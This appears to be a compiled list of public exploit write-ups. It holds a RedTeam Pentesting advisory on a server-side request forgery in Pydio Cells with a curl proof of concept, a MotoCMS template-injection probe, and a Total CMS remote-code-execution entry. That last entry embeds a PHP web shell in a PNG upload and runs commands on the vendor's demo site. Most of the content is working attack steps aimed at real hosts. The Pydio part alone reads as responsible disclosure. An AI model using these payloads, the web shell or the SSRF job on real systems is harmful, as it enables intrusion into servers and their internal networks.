Timeline ======== 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References ========== [1] https://aws.amazon.com/sdk-for-javascript/ RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen
  23. Exploit Title: Pydio Cells 4.1.2 - Server-Side Request Forgery Affected Versions: 4.1.2 and earlier versions Fixed Versions: 4.2.0, 4.1.3, 3.0.12 Vulnerability Type: Server-Side Request Forgery Security Risk: medium Vendor URL: https://pydio.com/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005 Advisory Status: published CVE: CVE-2023-32750 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750 Introduction ============ "Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues." (from the vendor's homepage) More Details ============ Using the REST-API of Pydio Cells it is possible to start jobs. For example, when renaming a file or folder an HTTP request similar to the following is sent: ------------------------------------------------------------------------ PUT /a/jobs/user/move HTTP/2 Host: example.com User-Agent: agent Accept: application/json Authorization: Bearer G4ZRN[...] Content-Type: application/json Content-Length: 140 { "JobName": "move", "JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}" } ------------------------------------------------------------------------ The body contains a JSON object with a job name and additional parameters for the job. Besides the "move" job, also a job with the name "remote-download" exists. It takes two additional parameters: "urls" and "target". In the "urls" parameter, a list of URLs can be specified and in the parameter "target" a path can be specified in which to save the response. When the job is started, HTTP GET requests are sent from the Pydio Cells server to the specified URLs. The responses are saved into a file, which are uploaded to the specified folder within Pydio Cells. 
Potential errors are transmitted in a WebSocket channel, which can be opened through the "/ws/event" endpoint. Proof of Concept ================ Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then, run the following commands to start a "remote-download" job to trigger an HTTP request: ------------------------------------------------------------------------ $ export JWT="<insert JWT here>" $ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \ | jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \ | tee remote-download.json $ curl --header "Authorization: Bearer $JWT" \ --header 'Content-Type: application/json' \ --request PUT \ --data @remote-download.json 'https://example.com/a/jobs/user/remote-download' ------------------------------------------------------------------------ The URL in the JSON document specifies which URL to request. The "target" field in the same document specifies into which folder the response is saved. Afterwards, the response is contained in a file in the specified folder. Potential errors are communicated through the WebSocket channel. Workaround ========== Limit the services which can be reached by the Pydio Cells server, for example using an outbound firewall. Fix === Upgrade Pydio Cells to a version without the vulnerability. Security Risk ============= The risk is highly dependent on the environment in which the attacked Pydio Cells instance runs. If there are any internal HTTP services which expose sensitive data on the same machine or within the same network, the server-side request forgery vulnerability could pose a significant risk. In other circumstances, the risk could be negligible. Therefore, overall the vulnerability is rated as a medium risk. 
Timeline ======== 2023-03-23 Vulnerability identified 2023-05-02 Customer approved disclosure to vendor 2023-05-02 Vendor notified 2023-05-03 CVE ID requested 2023-05-08 Vendor released fixed version 2023-05-14 CVE ID assigned 2023-05-16 Vendor asks for a few more days before the advisory is released 2023-05-30 Advisory released References ========== RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/
  24. # Title: MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI) # Author: tmrswrr # Date: 31/05/2023 # Vendor: https://www.motocms.com # Link: https://www.motocms.com/website-templates/demo/189526.html # Vulnerable Version(s): MotoCMS 3.0.27 ## Description MotoCMS Version 3.4.3 Store Category Template was discovered to contain a Server-Side Template Injection (SSTI) vulnerability via the keyword parameter. ## Steps to Reproduce 1. Open the target URL: https://template189526.motopreview.com/ 2. Enter the payload here: https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}} 3. You will see that the result is 49 Vulnerable URL: https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}} GET /store/category/search/?page=&limit=&keyword={{7*7}} HTTP/1.1 Host: template189526.motopreview.com Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Dnt: 1 Referer: https://template189526.motopreview.com/store/category/search/?keyword=%7B%7B3*3%7D%7D Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close
  25. # Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE) # Date: 02/06/2023 # Exploit Author: tmrswrr # Version: 1.7.4 # Vendor home page: https://www.totalcms.co/ 1) Go to this page and click the "edit page" button: https://www.totalcms.co/demo/soccer/ 2) Scroll down and you will see the downloads area 3) Add a shell.php file in this area ?PNG ... <?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?> IEND 4) Then open this file and issue commands https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id Result : ?PNG ... uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data) IEND